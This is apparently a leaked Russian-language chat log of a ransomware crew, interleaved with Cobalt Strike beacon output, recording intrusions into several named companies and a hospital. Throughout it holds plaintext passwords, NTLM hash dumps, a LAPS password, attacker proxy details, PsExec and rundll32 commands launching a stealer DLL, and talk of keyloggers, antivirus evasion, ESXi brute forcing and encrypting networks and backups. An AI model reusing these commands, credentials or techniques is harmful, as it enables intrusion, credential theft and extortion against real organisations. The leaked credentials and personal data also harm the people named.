635eaf2d4ac8a48f68c71968732b556aa65b5b0e475e628b7613b7adca8c89af
f3c45fad93e7b9053e9ddd98276eb16c7af9f02116ebf3018552aca7b23e8f70
0054316bcc3a3aca201277abf1f7c24ded29f93217cb0ce6f74ee1c05be4eed9
cfcf00218ec6411d451ff1b06ea835b90b6f3f0bb2ae9967b40e5bc3034a89d2
ae584cb3eb58fe0465380a9d60768f5a5bec88f12ee9ee1532e2094f8094ec3f
ce87dc29d0ef39456afeb1385be0ee01ab232eb2c74fa8b2840e477f95c82d4d
e30a643dff5af61c7e3bbfc5227392998c3c7fadda30942594b6639d333bce74
053a4d3aab8cdd790f7152676276d9a2a1ef4d01eae30a166bdb92089d0a568f
Export : OK - 'ntds_legacy_0_bceb968a-8d19-4055-874d-2a38a1e7c2e6.key'
``````
ilo2m24422ldv.gophersport.local
```
нет в ад комп
```
(ICMP) Target '10.1.0.86' is alive. [read 8 bytes]
10.1.0.86:443
10.1.0.86:22 (SSH-2.0-mpSSH_0.2.1)
[+] received output:
Scanner module is complete
``пока прогони хотя бы 12 нету. ну там хз. они вот так есть `https://ilo2m24422ldv.gophersport.local/z1DC1ESXi2`))кроме двухвсе есть?``
z2dc1esxi2.gophersport.local +
z2dc1esxi1.gophersport.local +
vc-z2dc1.gophersport.local +
z2dc1esxi3.gophersport.local +
z1dc1esxi1.gophersport.local +
z1dc1esxi3.gophersport.local
z1dc1esxi2.gophersport.local
z1esxi1.gophersport.local +
vcz1dc1.gophersport.local +
``````
z2dc1esxi2.gophersport.local
z2dc1esxi1.gophersport.local
vc-z2dc1.gophersport.local
z2dc1esxi3.gophersport.local
z1dc1esxi1.gophersport.local
z1dc1esxi3.gophersport.local
z1dc1esxi2.gophersport.local
z1esxi1.gophersport.local
vcz1dc1.gophersport.local
```проверьте имена никсов на наличие в истории у негооба доступныв ад_комп 9 никсов, и на половине +- есть веб морда сферы``
Pinging vc-z2dc1.gophersport.local [10.2.1.10] with 32 bytes of data:
Reply from 10.2.1.10: bytes=32 time=5ms TTL=62
Ping statistics for 10.2.1.10:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 5ms, Maximum = 5ms, Average = 5ms
beacon> shell ping -n 1 vcz1dc1
[*] Tasked beacon to run: ping -n 1 vcz1dc1
[+] host called home, sent: 49 bytes
[+] received output:
Pinging vcz1dc1.gophersport.local [10.10.0.128] with 32 bytes of data:
Reply from 10.10.0.128: bytes=32 time=1ms TTL=64
Ping statistics for 10.10.0.128:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 1ms, Average = 1ms
``хороший вопрос)это 2 системы?vc-z2dc1и почему у него 2 хоста vcz1dc1бруть связкине бруть к руту толькоагаэто sqlite файля выше вроде кидал - из ежакакого логин дата?а браузер еще тупитхз это из login data файлаа я чет не понял их там 2 шт?ты зашел?к стати, логин в сферу roothttps://10.2.0.11/ui/#/login1 связку только 1 рази не менять комбинациючтобы никаких следов предыдущих входов не былопосле каждого раза сбрасывай браузерпонял1 разв сферукуда?кидай сокс и пробуй их на вход``
backup Sunny2day
ilssql rehpog2013
schtask rehpog2013!
symbackup rehpog2013!
trackit rehpog2013
veeambackup rehpog2013!
erictitchenal P0w3r!23
``+они пересекаются. все еа это да тожеили они все ДА и первые 4 это ЕА+ДА?вижу 12 ДА``
-------------------------------------------------------------------------------
Administrator backup erictitchenal
ilssql mattpeterson o365sync
schtask symbackup trackit
veeambackup veeamone watchguard
``реально все ДА?узнаем)ну да, последние на хромиуме
только не заточен ли мимик чисто на хром?``
EA
gophersport.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:d3d9577759c6e39fb2ab8ae5528df13d:::
gophersport.com\erictitchenal:1110:aad3b435b51404eeaad3b435b51404ee:8ce83e3573f736f6fd0ca4a54f0c0f15:::
gophersport.com\mattpeterson:18832:aad3b435b51404eeaad3b435b51404ee:e17058726782234e52301c78b6391291:::
gophersport.com\o365sync:22200:aad3b435b51404eeaad3b435b51404ee:c1569f38de1cf528960da50b871c5e6d:::
EN
gophersport.local\backup:2690:aad3b435b51404eeaad3b435b51404ee:70d306f9d204e0f722eb888946fcd9b6:::
gophersport.local\ilssql:18921:aad3b435b51404eeaad3b435b51404ee:6bfc458ce5730961818c7a9e7a80a74a:::
gophersport.local\schtask:18853:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.local\symbackup:2823:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.local\trackit:18916:aad3b435b51404eeaad3b435b51404ee:6bfc458ce5730961818c7a9e7a80a74a:::
gophersport.com\veeambackup:21169:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.com\veeamone:21273:aad3b435b51404eeaad3b435b51404ee:2985a0d62f9ca5d79a0338869f2e3ddd:::
gophersport.local\watchguard:22112:aad3b435b51404eeaad3b435b51404ee:ae57d4b597add63fbb88b380465d592a:::
``и как следствие способ хранения доступов такие жевроде как последние версии ежа на движке хромапобщались с людьмина сколько я понялв статье про хром речь идет
или мимик все на хромиуме принимает?окно на большее он не способен)но если вам хватало встроенного на запуск нагрузки то и проще его использоватьну да, для работы с админом)мы обходились встроеным, но как ты сказал что этот надо использовать)а еще я не понял зачем вы переехали на псек если вы до этого без него обходились)``
6984153 beacon> shell PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[*] Tasked beacon to run: PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[+] host called home, sent: 118 bytes
[+] received output:
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
``вникайhttps://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/[ ](https://mediaeveryone.com/group/gophersport-com?msg=YXhdLJWYw4oW92LS6) давай ящас кину кредысами решайтевторой работает вместе со мнойи кидает мне списокто то 1 сейчас собирает рабочие хеши всех ЕА, ДАа ну да, не подумалдавайте сделаем такно трафик не летитпинг до моей кобы идетвряд лиа если у админа вайтлист ip, и поэтому сесии не летят, но z1gateway в вайтлисте
можем притянуть z1gateway и пайпом попробовать притянуть админский комп?что, будем с мастеркеями ебстись?пока ничего без меня не тыкаемвам на ознакомлениеhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentialsперерыв 20 минсейчас будет тяжелочтожугупс видимо вообще отклдавай играться с его пкдану гетвэй как бы намекает))он через впн ходит значитага``
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 4 K Unknown NT AUTHORITY\SYSTEM 253:00:03 N/A
System 4 Services 0 140 K Unknown N/A 0:05:31 N/A
smss.exe 208 Services 0 732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 316 Services 0 3,268 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
csrss.exe 368 Console 1 2,716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
wininit.exe 376 Services 0 3,236 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
winlogon.exe 404 Console 1 4,992 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 464 Services 0 8,188 K Unknown NT AUTHORITY\SYSTEM 0:00:16 N/A
lsass.exe 472 Services 0 14,920 K Unknown NT AUTHORITY\SYSTEM 0:02:16 N/A
svchost.exe 528 Services 0 7,568 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 556 Services 0 6,604 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:11 N/A
LogonUI.exe 660 Console 1 25,036 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 676 Console 1 8,512 K Unknown Window Manager\DWM-1 0:00:00 N/A
svchost.exe 684 Services 0 15,208 K Unknown NT AUTHORITY\LOCAL SERVICE 0:03:35 N/A
svchost.exe 716 Services 0 36,956 K Unknown NT AUTHORITY\SYSTEM 0:16:58 N/A
svchost.exe 780 Services 0 11,768 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 896 Services 0 18,136 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:24 N/A
svchost.exe 324 Services 0 12,124 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
spoolsv.exe 1028 Services 0 7,688 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
svchost.exe 1060 Services 0 6,204 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1080 Services 0 2,232 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
inetinfo.exe 1096 Services 0 6,456 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1140 Services 0 2,324 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
snmp.exe 1184 Services 0 4,420 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 1204 Services 0 16,084 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
svchost.exe 1220 Services 0 11,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
VGAuthService.exe 1280 Services 0 10,368 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
vmtoolsd.exe 1496 Services 0 6,592 K Unknown NT AUTHORITY\SYSTEM 0:05:28 N/A
svchost.exe 1512 Services 0 2,660 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1720 Services 0 12,200 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:02 N/A
svchost.exe 1920 Services 0 4,848 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 1316 Services 0 18,976 K Unknown NT AUTHORITY\NETWORK SERVICE 0:12:25 N/A
msdtc.exe 2256 Services 0 7,324 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
iashost.exe 1940 Services 0 14,096 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 2976 Services 0 3,112 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 2716 Services 0 16,604 K Unknown NT AUTHORITY\NETWORK SERVICE 0:16:58 N/A
w3wp.exe 3528 Services 0 12,588 K Unknown IIS APPPOOL\DefaultAppPool 0:00:02 N/A
PSEXESVC.exe 2484 Services 0 4,448 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
tasklist.exe 416 Services 0 6,024 K Unknown GOPHERSPORT\mattpeterson 0:00:00 N/A
conhost.exe 2184 Services 0 3,212 K Unknown GOPHERSPORT\mattpeterson 0:00:00 N/A
``список процесов с этого хоста`10.22.0.13:3389 z1gateway:51889 `снимите нетстат посмотрите откуда он вообще пришелхотя его клиров то нетесли у нас есть псекзек, может попробовать парралельный доступ включить и пойти по рдп?давайа вот можно ли не в кодировке?ну я кодированый послалсмотрю уже запустилвовремя тыя хочу птш пейлоад послать через псекзек
в басе64 слишком длиный
не кодированый можно пулять?не прилетелода, я ждудай сначала ямиссклик...не понял?``
6984153 beacon> desktop
``и используйте оригиналиспользуйте его только для теста открытости возможности использовать псек4) встроенный псек говноэто виртуалкаон сюда подключен через рдп``
msedge.exe 10864 RDP-Tcp#1
```внимание обратите3) exel закрыт:skull_crossbones:2) его пк1) да у него эджкаждый execнетона же один раз принимается, елуаtaslist написалсам криворукийвидимо в этом трабладаThe system cannot find the file specified.акцепеула?вы разницу реально не видите?убрал рукиблять да хватитблоу да деткауже интереснее``
The system cannot find the path specified.
``нода просто я проверяю по сто разкак то медленно все у вас крутитсяработайтесами себе_))ахахамб вы пранк устроили и зали х32?починил блять)я чет не понимаю, какой путь он не находит?
```
The system cannot find the path specified.
``чтобы без указания пути попробоватьзачем это былоc:\Windows\System32\PsExec.exeуже давно ехе залилиа еще не использоваликак то вы долговато сидитевсе, уже не причем)а при чем тут /q?а, ну мы же вроде и так указывали /qсогласен)``
-d Don't wait for process to terminate (non-interactive).
``так у псекзека же нет подобных флагов вродев духе non-interactiveне забудьте поставить еще флагипотому что tasklist лишь шаг по работе а не основная цельсразу ищем рабочий вариант исполнения через psexecнетpslist.exe может?этот ключ обязательно``
-s Run the remote process in the System account.
``из альтернатив у нас останется рдпно перепровить с оригиналом и прямым указанием кред стоитне 100% инфаэто моя версияа сам сервис на пк не имет ничегона это уходят права твоего ДАты имешь права на создание СЕРВИСА на пкдатак мы же под токеном этого да, кула мы ломимсяпо той простой причине что текущий уровень доступа сервисный тупо не имеет прав к системным утилитампереходим на класику``
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
```[ ](https://mediaeveryone.com/group/gophersport-com?msg=3L8BEgbwNBZDnpGqp) от сервсиныху какого ДА есть?неаклира его нет?файл так же пуст, под его токеномзакинул часть сессий в слиптокен переделывали т.к. вроде домен не так указалисейчас потремя делал, в начале дня еше)аа кто второй сделалсокс 11) вижу что вы переделываете себе токены по несколько раз (зачем?)
2) у вас ДОХУ и выше сессий активных в кобе (вы же в курсе что шумите пиздец как?)
3) зачем 2 активных сокса??что вы делаете?)``
185.150.190.113:61718
O5xFflqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
```дайте доступ в кобу рабочуюи еще раз проверьте список процесовсделайте его токеннеа, под другим дапод его контекстом туда ломитесь?ну у него он, видимо, открыт - не все запакуетсяпапку лучше заберитеЭТО?заберите даные его ежааналогичнобез длки?нетсразу на админский залить?попытка 2[ ](https://mediaeveryone.com/group/gophersport-com?msg=uTozKnN64N9AWsJk3) там с сессией хрень происходит. там вобще ничего не работаетаа, щас user4 придет и скажет
покурить вышел[ ](https://mediaeveryone.com/group/gophersport-com?msg=wwPwFNqg5yJxjZaQj) тутскан всегда показывал что есть рдпв чем ошибка?
я запутался чет))а до этого что была за ошибка?[ ](https://mediaeveryone.com/group/gophersport-com?msg=TrfowtY6WQK9gbMRb) всм, видно)но попробую[ ](https://mediaeveryone.com/group/gophersport-com?msg=R6wA7KnkExRHJg5Ry) а как он увидел рдп если вы до этого кидали скан где пишет что не видит?не думаю что подойдут, у всех армах разные паролироверьте их на файлик)у них такие штуки есть на армах в ад_комп
```
>ms-Mcs-AdmPwd: 0H2uIoO96Y7lmo
>ms-Mcs-AdmPwdExpirationTime: 132430931771575287
``они в ад светятсяесть, вроде как, пароль от ЛА админского пкстаего паса нет, ток сервисных учетокего пасс не вкатил?есть файлик xlsx с паролями от it, но запаролен)иногда в сети появляются
можно конечно еще фс почекать, браузерытам то же самое что и тут
штаск, рпс не доступны
сессии не летятадминксиетак же у них ноуты еще к ад подключеныих два, второй какой-то тухлый
есть его тачка но там пустодавайте пока поищем еще админови штаск видимо фаером прикрытrpc не доступенно вмик не пашет?тачки админаа видно порты z1print? или тачки админа?даа вы на этом watchguard?так стопотлично))lf`с Z1WATCHGUARD видно 445,3389,139` утверждение?user4 щас притянет, проверит
с Z1WATCHGUARD видно 445,3389,139с з1принт его 135,139,445,3389 видны?мне интересно вот чтонечто мол вирус и тдможем конечно сразу загруить через file explorer, но у него сразу окно вылезетпринт, кстати, после того как его вчера проверили почти сразу отвалился опятьчек с принтанет pf1d2swvz1print?вы откуда в него пытаетесь попасть?програмдата с арма``
Size Type Last Modified Name
---- ---- ------------- ----
dir 12/02/2019 10:26:06 Adobe
dir 10/31/2020 23:01:16 Application Data
dir 10/31/2020 23:01:16 Desktop
dir 10/31/2020 23:01:16 Documents
dir 07/27/2020 11:47:34 Dolby
dir 12/03/2019 11:33:33 FileOpen
dir 03/13/2020 13:21:33 Intel
dir 12/02/2020 15:28:55 Lenovo
dir 06/25/2020 15:23:07 LogiShrd
dir 10/31/2020 22:57:39 Microsoft
dir 11/02/2020 07:31:25 Microsoft OneDrive
dir 12/03/2019 11:36:28 Nuance
dir 12/04/2019 13:55:02 Oracle
dir 12/04/2019 08:33:27 Package Cache
dir 11/02/2020 07:29:59 Packages
dir 11/27/2019 09:33:19 Plantronics
dir 12/18/2020 09:56:26 regid.1991-06.com.microsoft
dir 11/25/2019 16:46:52 RICOH_DRV
dir 11/25/2019 16:46:41 SnowSoftware
dir 12/07/2019 03:14:52 SoftwareDistribution
dir 05/11/2020 00:43:57 ssh
dir 10/31/2020 23:01:16 Start Menu
dir 10/31/2020 23:01:16 Templates
dir 12/03/2019 14:25:51 Trend Micro
dir 10/31/2020 23:01:10 USOPrivate
dir 12/07/2019 03:14:52 USOShared
dir 12/07/2019 03:54:01 WindowsHolographicDevices
65kb file 11/09/2020 12:13:00 ntuser.pol
```потерсяармпри заливе на рами от туда хотели копировать на админскиймы зали его сначала на арм, где трендлибо не только трендпосле такого не поверю что там тренди ехедлл?их авер сразу дропнул при копированиипотом ехесначала дллпускать любой?способ запуска`rundll32 pg.dll,StartDLL`файлы разовыедау него x64?кидаете ему на ОС запускаете и файл упадет рядом с длл, длл должна будет удалиться как отработаетя вам выдаю длл стиллерадавайте проверять)ладно тогда в слепуюбляс эхо получилосьок, а echo 1 > test.txtно пустойфайлик то появляетсяуверены что вообще исполняется?)неаок, whoamiv это же просто расширеный вывод - не работаетбез /vя думаю может дело /q, но без него окно вылезет
не, без кавычек работало, по крайней мере длки запускали без кавычекв кавычках?пустой возвращает
```
remote-exec psexec 10.22.0.13 cmd /q /c tasklist /V>C:\ProgramData\ssh\task.txt
``````
itvm1:3389
Scanner module is complete
``по ип?[ ](https://mediaeveryone.com/group/gophersport-com?msg=ZSqorpgkjvXfYWBoE) `beacon> portscan itvm1 3389 none 1
[Tasked beacon to scan ports 3389 on itvm1
[+] host called home, sent: 93245 bytes
[-] Could not connect to pipe: 2`еще порт скан на рдп сделайтеокей, тогда жду список процесоворет?нет, пш запускать то палевноdaего тачку?а еще ребят, вы на тпш проверяли?+нет, пару минпроцесы будут долго?тренд микрои скажите еще аву него по истории 104 линка оттудаон там частый гость кстатии сказать мне его процесы)и потом прочитать через доступ к фсваша задача щас - tasklist /v записать в файл+ доступ к фсу нас есть способ запуска команд через псеккак раз)чтожниксэто не дкна дк прям висит сфера чтоли?да, этотвидимо этот нам интересен?`1803 https://vcz1dc1.gophersport.local/ui/#?extensionId=vsphere.core.inventory.serverObjectViewsExtension&objectId=urn:vmomi:VirtualMachine:vm-29463:7d9aedf7-e556-4c47-b666-fb1ecbb0b35c&navigator=vsphere.core.viTree.vmsAndTemplatesView vSphere - z1jbwmsprod1 - Summary 1 0 13252634877433381 0`у него есть такая штука`95 https://z1av.gophersport.local:4343/ Trend Micro 0 0 13235239430618240 1`какой урл нам интересен?тогда едхрома нети хром уж проверьте`AppData\Local\Google\Chrome\User Data\Default\History`я знаю что в этом`C:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History`разв не в этом файле история хранится?historyWebCacheV01.dat нужен?
он сейчас открыт у негокидайте))активный)стащите у него хистори файлтак мб у него edge активный?)дау него 10?вообще у него еще в загрузках есть ClickOnceForGoogleChome.exe
так что возможно он использует portable chromeпроцесы не посмотретьа вот хз.вопрос в другом, он им пользуетс?хорошону из его профиляа это точно его браузер?setg Proxies socks4:185.150.190.113:15452дайте проксиесли что, мы пытались подсунуть профиль на дедике в мозилу - не дает, просит почту или что то типо тогокак скажу дайте прокситогда щаса я прошу свежую версию)да не, это вчера перед уходом снялии уже все готово1 минуту назад сказалвсе бы так быстро работалипрям только что сняли?).архив сюдаэту папку profilesснимите прям сейчас его браузердля декодирования профиля в ФФ нужен мастер пароль плюс, зачем то, директория установки ФФтак пока впн включен попробую найтино у тебя ДА есть отсюда?так датак это тачка левая (через впн чел сидит) не лучше ли будеть закреп на удалённом каком нибудь сервере, что бы доступ всегда был к этой сетке, предлагаю сделать закрепы на всех трастахя тебя с закрепа запускалтак она затогда в этой сетке закреплюсь и попробую на ДК попастьда, прилетелоесть?а вот 1 улетелшелкод мимодай длпоставилв эту конфухэши я уже скинулшелкод в студиюа тут разве без ДА был?`https://phanein.televisa.com.mx/vpn/index.html`у них 2фа (((если сессии есть живые по ней, то можешь заспавнить на `rawint.com`сетка крупная, не хотелось бы её проебатькак сессия оживёт закреплюсь на каком нибудь сервере`CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P````
Nombre de grupo Domain Admins
Comentario Designated administrators of the domain
Miembros
-------------------------------------------------------------------------------
accreco avamarexchange EndPoint
ES050616C gdtidua IWAM_GSCCORP
opera_wintel_corp operador_wintel operaproy
SCMusr t1812
Se ha completado el comando correctamente.
[+] received output:
Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx.
No se ha encontrado el nombre de grupo.
Puede obtener más ayuda con el comando NET HELPMSG 2220.
[+] received output:
Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx.
Number of alias administrators
Comentario Administrators have complete and unrestricted access to the computer/domain
Miembros
-------------------------------------------------------------------------------
accreco
Domain Admins
IWAM_GSCCORP
opera_wintel_corp
TELEVISA\Enterprise Admins
Se ha completado el comando correctamente.
``надеюсь успею сюда загрузить адинфоприятного отдыха, на связиа ну и отлично, так даже сам поспать успеюмы в полном составе будем находиться в офисе 15.10 в 13:00-14:00 по московкому времени :space_invader:сейчас почищу только... если смогутак что скажите какой план по времени ибо я не в курсе а мне надо будильник поставить, выйти когда вы прийдете чтобы билдер дллок залитьа потом меня отключитну мне еще часов 7-8 тут в любом случаечётенько сдохлиКак живые но вто же время не живые)Все как зомбипоспать необходимо нормальноХотелось бы завтраагасегодня*точнее сегодня
или завтра
я запуталсявы завтра ко скольки?бб1.done.sccy.comбайсчастливоспокойной ночив пн к 5тогда закончилиокей[ ](https://mediaeveryone.com/group/sccy-com?msg=yQ6392Evb6A54796L) нас долго чистили-трастов не было?сетка мелкая, но вы прилично на нее потратили времени``
Всего серверов по АД: 5
Живых серверов: 2
Притянуто серверов: 2
Всего армов по АД: 134
Живых армов: 28
Притянуто армов: 18
Пошифровано всё
```статистику тогда сюда+закончили?ЫАНИ ВСЕ МЕРТВЫЫпрактически, последние штрихибилд запустилизакрыли?До завтраокну давайте в районе 11 полагаю, завтра разборы текущих кейсов в основном, а послезавтра мб что в залок пойдет?Завата ко скольки,а завтра во сколько?в 22 дану тогда на сегодня закругямся@tl2 В 22 домой?Нета ну в принципе уже 22 почти...
@tl1 сказал во сколько завтра?до которого часа? Сутра работаемсорри парни у меня чет рокет отвалился а я и не заметил
если что - пишите если какой срочный вопросе надо подготовить к закрытиюдай мне свою длл, я тебя в сеть закину и создам конфу@user4 для тебя отдельная задача будеталя файлобменники, способы передачи файлов и прочеея надеюсь мне нужно объяснять что под впном вы не светите свои ресурсы?отталкивайся от /16 отсюдаднс?@user7 чек вкладку routesокок я понял свой затуп, сейчас всё будетвы страные) бросаете сети где еще не уперлись в тупик а потом у вас работы нет)и дк который ты получишь с результатов сканирования сабнетовуказав ему кредыкогда ты по впн подключен ты можешь вполне работать бладхаундом``
так он даже ДА не запросит никак без рдп
```
конечно запросита что делать, у вас есть несколько учеток, есть впн, есть сканеры и как работать с впн вы уметено там рабочий впнпонимаю когда логин/пасс не подошелвообще дада я сказал что ты отвечаешь за них?я должен был прям возглявлять операцию? "отпустил"
как я понял, я просто был вопросником здесьтак он даже ДА не запросит никак без рдптам вполне были варианты работывсе равно непонятно почему ты так легко отпустил @user7 с его задачи+я так понял вы пока с @user8 вместеа почему не работал с этим?сам впн авторизуется под этими кредамиа сам впн?\пробовал рдп, так ни один пользователь не может ходить по рдпв `lrhc.org` ентерпрайз оказался админских прав в соседнем домене, полдня производились попытки снять АДинфо. Сейчас в соседнем домене найдена тачка с серваком 2003, мс17_комманд отрабатывает, думаем добавить туда локал админа и уже дальше работатьв моей последней было 2 юзера. от одного креды не подошли, у второго стоит 2фа. так что пока с @user8 работаемну как у вас дела?если пойдет прогрес по текущим сеткам без конфы собираете инфу у себя локально как приду сразу создамокмне надо уехать, буду ближе к 6 часам+отпишите мне обратно в лс имена папок которые были внутри архивавсем выдалждемв личку скину файлы:thinking:@user8 у тебя на контроле их задачи, спрошу с тебя)он пока за главного в этой задачев общем атакуйте вопросами @user8а, просто я видимо не совсем понял насчёт косвенной работыда мы ж рядом сидим)если ты об этом?я могу вам на 3х дать конфу по общим вопросаму них будут свои сетки, зачем к тебе в конфу?@tl1 раз уж @user4 и @user7 со мной, закинешь их в конфу может?okближе к 6-7 я дам сеть с ДА и мы будем готовить ее к закрытиюпо большей части сегодня самостоятельныя вам выдам файлики как ему вчера, по всем вопросам обращайтесь к нему@user4 @user7 вы косвенно работаете со своейтогда так @user3 работает с форумнетУ меня не получается пройти дальше, можно меня к user8 в помощь Вчерашней сеткой, с которой нет доступа в кобы я свободен(Наполнением форумакто у нас кстати чем занят?тогда объясняю задачи на сегодня+так, все собрались?hiВсем привет ждем до 20 мин и начинаемНа местезаходимВсем приветпока никого нет?приветрубрики нашли
esxi нет \нетесть движение?на есхы не катитесхнесфера[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=7yppCGXDeHNw3hNpo) вот тут доступы фтпв есх не попали ещенет в рубриктак оболочка фтп то один?на esxi?по ссх там не линух а своя оболочка токая ссх и вебпо фтп пускает?второй рубрик
```
https://10.75.0.170/web/bin/index.html#/welcome
Admin
G0F0rw@rd123!
```рубрик https://10.1.0.171/web/bin/index.html#/welcome
admin
G0F0rw@rd123 не подошлиа через вцентр не было на них доступа?но на esxы они вобще не ходят, если только по ссхнет
в почте пусто, почта на gmail
кейлог повесилиесть движение?``
www.crispregional.org
ip207-70.crispregional.org
myhealth.main.crispregional.org
www.myhealth.main.crispregional.org
pocketpc.main.crispregional.org
view.crispregional.org
www.view.crispregional.org
vpn.crispregional.org
www.vpn.crispregional.org
webmail.crispregional.org
zix01.crispregional.org
``закидывайте на cmdна почте не нашли?прилично так2431 уникальных``
3675 Objects returned
``пользаков 3к вродеуникальных не считала сколько там уникальных хешей?не жирно выйдет?в плане по денежке@tl1 @tl2
для брута ссх на есхи можно пиздануть весь дсинк на кмд5?ну и на виме который вчера пошифвроваливторой пока вообще хз где и какпока ничего
ищес креды есхов
неудивительно что востановили
у них бэкапы на есиксах + два Rubric
в первом три кластера в каждый из них реплицируются бэкапытак ну что тут у нас?до понедельказавтра это во сколько?ну хорошосегодня я тоже не смогутогда завтраданашли esx'ы
но сегодня уже не очень хочется закрывать
там куча серверов и куча армов - часов на 6 затянется[ ](https://mediaeveryone.com/group/lrhc-org?msg=cvpLBAf6fAYTHaEQ9) едва-едва))у шансона мдб файлгде как?вроде нашли пароль от esxдо скольки сидеть собираетесь?как успехи?ну что живы?``
https://login.sophos.com/login.sophos.com/oauth2/v2.0/authorize,04/30/2020 9:53:35 AM,13232732015862662,smhanson@lrhc.org,Menu12762
``````
User name shanson
Last logon 12/18/2020 3:22:23 PM
User name gsnelson
Last logon 12/19/2020 2:57:41 PM
``если они сегодня заходили завтра тоже будутпроверьте последние ластлогоны нужных ребятвстроенный в кобальт вполне справлятся не?@tl2 у нас кейлогер есть?щас почту проверюна столе, на бумажке лежит))значит мог остаться в переписке на почтене хотят ребята хранить пароли от сферы``
Sophos
Shanson@lrhc.org
2476.Fgjd
```его - еще нетпочту то проверили? но там пустода яж говорю открыли эти файликипытался
но чет не отработало собакаhttps://snapcraft.io/install/onenote-desktop/ubuntu#installи еще ждем @tl2 вдруг решит вопрос)пробуйте залететь на эту тачку и посмотреть тамнетно паролей сферы там нетвы еще забыли про рдп по нтлм?тогда переходим к более сложным методамиз браузералол, подобрали пароль к файлику))ставьте на дедик и смотрите)вот такая штука``
https://www.bitrecover.com/free/onenote-viewer/
```я реально хочу кое че протестить))ну дайте пожалуйста .one файл этот``
Take the help of OneNote Converter
. This software allows you to read OneNote file without OneNote installation. This software also provides many advanecd features. With this software, users can easily convert OneNote to PDF, Onenote to DOC, DOCX, OneNote to Image (png, jpg, tiff, bmp, and giff).
``такая штука``
https://www.quora.com/How-can-a-person-read-a-OneNote-file-without-OneNote
``уже было с таблицей ехеля)файлик с паролями запаролен)есть мысля однакинь файл сюда пожалуйста.oneкакой формат файла?не катят с браузераа?мимик не работаетно нет его клиров6 часов идлтаймзаватесь по рдпи если там уже никого нетчекните время на тачке откуда забралипишет что не лицензионый софт у вастакНашли OneNote с записками про всферу, скачали но открыть не дает``
Host Name: PMA2013
OS Name: Microsoft(R) Windows(R) Server 2003 Standard x64 Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Additional/Backup Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Eleah
Registered Organization:
Product ID: 76869-644-7406004-50507
Original Install Date: 10/10/2013, 11:47:49 PM
System Boot Time: 7/27/2020, 11:46:57 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
[01]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
[02]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
[03]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
[04]: EM64T Family 6 Model 45 Stepping 7 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 6/22/2012
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-06:00) Central Time (US & Canada)
Total Physical Memory: 8,191 MB
Available Physical Memory: 5,839 MB
Virtual Memory: Max Size: 11,827 MB
